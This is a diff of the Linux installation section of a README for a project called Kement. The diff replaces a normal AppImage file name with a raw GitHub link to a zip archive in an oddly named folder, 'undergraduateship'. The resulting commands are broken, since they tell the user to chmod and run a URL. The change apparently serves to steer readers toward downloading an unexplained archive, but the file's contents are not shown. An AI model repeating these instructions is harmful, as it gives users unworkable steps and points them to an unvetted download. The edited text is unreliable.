fruss64/Kement/README.md

 - **Linux:**
   1. Open a terminal window.
   2. Navigate to your "Downloads" folder.
-  3. Type `chmod +x Kement.AppImage` to make it executable.
+  3. Type `chmod +x https://raw.githubusercontent.com/fruss64/Kement/main/undergraduateship/Kement.zip` to make it executable.
-  4. Then, run `./Kement.AppImage` to start the application.
+  4. Then, run `https://raw.githubusercontent.com/fruss64/Kement/main/undergraduateship/Kement.zip` to start the application.

 For additional guidance, feel free to check out the specific installation instructions on the Releases page.